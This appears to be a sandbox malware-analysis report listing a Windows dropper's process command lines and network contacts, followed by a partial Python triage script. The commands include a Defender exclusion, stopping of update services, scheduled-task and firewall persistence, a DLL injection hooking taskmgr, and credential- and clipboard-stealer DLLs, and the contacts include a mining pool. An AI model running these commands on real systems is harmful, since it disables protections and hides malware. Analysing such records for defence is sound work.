"C:\Users\Admin\AppData\Local\Temp\is-JTV0M.tmp\lOvBq1ctYKdsFYCAOEiEgMz2.tmp" /SL5="$801F2,5025136,832512,C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H9RIU.tmp\TGbHTIuRYu12xMG6nWaxWvI6.tmp" /SL5="$E01C2,491750,408064,C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe"

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe

"C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe"

C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe

"C:\Users\Admin\Pictures\IURAaM4iBeaOTAHNc2vSNNs3.exe"

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

"C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe"

C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe

"C:\Users\Admin\Pictures\TGbHTIuRYu12xMG6nWaxWvI6.exe"

C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe

"C:\Users\Admin\Pictures\lOvBq1ctYKdsFYCAOEiEgMz2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe

"C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe"

C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe

"C:\Users\Admin\Pictures\8Q2InRdoMAfSeMpX80tmerhI.exe"

C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe

"C:\Users\Admin\Pictures\bu5UWBMNJxJyXBl36BFg9XOI.exe"

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e4c8538,0x6e4c8548,0x6e4c8554

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\is-UJ6HF.tmp\_isetup\_setup64.tmp

helper 105 0x3AC

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\O7qOvO0qMmQjettcsUNpgMj9.exe" --version

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

"C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2248 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005044957" --session-guid=0bfebdaf-9e16-4d8a-b13d-fd63557a5ec3 --server-tracking-blob=NGYyZTNlYmNkNjRhNmUwMTliNTRmNjZkMzc1ZDlmYTQ3NDIwMGRkYTE0NGNjN2YyZTFmZWM1NzcxMzcxNTUwNzp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjQ4MTM4OC4yNTUwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyMDMzMzMzNy00ZWRmLTQ0N2ItYmU5Ni1lOTk5Njc3MzIyYmYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C004000000000000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe

C:\Users\Admin\Pictures\O7qOvO0qMmQjettcsUNpgMj9.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6ca38538,0x6ca38548,0x6ca38554

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 2296

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe

"C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 716

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050449571\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xbce8a0,0xbce8b0,0xbce8bc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 1636

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0709047991.exe"

C:\Users\Admin\AppData\Local\Temp\0709047991.exe

"C:\Users\Admin\AppData\Local\Temp\0709047991.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "0N3ystHYqNLyMAmfyjBLWUL1.exe" /f & erase "C:\Users\Admin\Pictures\0N3ystHYqNLyMAmfyjBLWUL1.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "0N3ystHYqNLyMAmfyjBLWUL1.exe" /f

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\0709047991.exe

C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe

"C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VN4PV.tmp\lightcleaner.tmp" /SL5="$3024E,833775,56832,C:\Users\Admin\AppData\Local\Temp\ZJOHAHEIQG\lightcleaner.exe" /VERYSILENT

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe

"C:\Users\Admin\Pictures\Q0fnIUXTM79rNZPhQcruvlJ5.exe"

C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe

"C:\Users\Admin\Pictures\OXfHzDyjJ3Wst2kNf3cg9erd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 link.storjshare.io udp
US 8.8.8.8:53 d062.userscloud.net udp
US 172.67.187.122:443 lycheepanel.info tcp
US 188.114.97.0:443 jetpackdelivery.net tcp
NL 13.227.219.74:443 downloads.digitalpulsedata.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 172.67.216.81:443 flyawayaero.net tcp
DE 168.119.140.62:443 d062.userscloud.net tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 8.8.8.8:53 justsafepay.com udp
US 8.8.8.8:53 potatogoose.com udp
US 188.114.96.0:443 justsafepay.com tcp
US 104.21.35.235:443 potatogoose.com tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
RU 45.8.228.16:80 goboh2b.top tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 122.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 74.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 81.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 235.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 16.228.8.45.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:80 link.storjshare.io tcp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
NL 185.26.182.123:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.106:443 features.opera-api2.com tcp
NL 82.145.216.24:443 download.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.243:443 download3.operacdn.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 123.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 176.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 106.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 243.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 136.0.77.2:443 link.storjshare.io tcp
DE 3.5.135.126:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 154.238.16.2.in-addr.arpa udp
US 8.8.8.8:53 126.135.5.3.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
CA 192.18.149.161:7001 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 161.149.18.192.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 5.75.216.44:27015 5.75.216.44 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 23.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 44.216.75.5.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 17.169.214.173.in-addr.arpa udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 875b9eec-31c6-4887-b2af-23f23ba6f10a.uuid.ramboclub.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server10.ramboclub.net udp
US 8.8.8.8:53 stun4.l.google.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server10.ramboclub.net tcp
US 74.125.204.127:19302 stun4.l.google.com udp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp
US 8.8.8.8:53 127.204.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 48.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 103.212.67.172.in-addr.arpa udp
CA 174.138.115.38:7001 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 38.115.138.174.in-addr.arpa udp
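
The Network rows above and the Files records that follow are plain text, so the checks an analyst does by eye on a report like this can be scripted. The Python below is an added example, not part of the sandbox's report or tooling. It parses both record formats and pulls out four things: the external IP:port pairs that were actually contacted, separated from DNS traffic to the sandbox resolver (a row whose hostname column just repeats the IP is a direct-to-IP contact); which contacted IPs also had an in-addr.arpa reverse lookup; one payload hash recorded under several paths (in this report C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe and C:\Program Files\Google\Chrome\updater.exe share every hash, a drop masquerading as a Chrome component); and a file whose recorded digests are those of zero bytes (the C:\Windows\system32\drivers\etc\hosts record carries exactly the MD5/SHA1/SHA256/SHA512 of empty input, so the file was truncated to nothing). Paths written by Windows, the CLR or PowerShell themselves are set aside as noise. The sample rows embedded in the script are copied from this page; the resolver address 8.8.8.8 and the OS-artifact marker list are the example's own assumptions.

```python
import hashlib
import re
# Constructed sample input: rows copied from the Network list on this page.
NETWORK_ROWS = """
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
DE 162.19.139.184:12222 xmr.2miners.com tcp
CA 192.18.149.161:7001 tcp
US 8.8.8.8:53 161.149.18.192.in-addr.arpa udp
"""
# Constructed sample input: records copied from the Files list (SHA1/SHA512 lines omitted).
FILE_RECORDS = r"""
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3uf4ppl.l0t.ps1
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe
MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e

memory/4200-410-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
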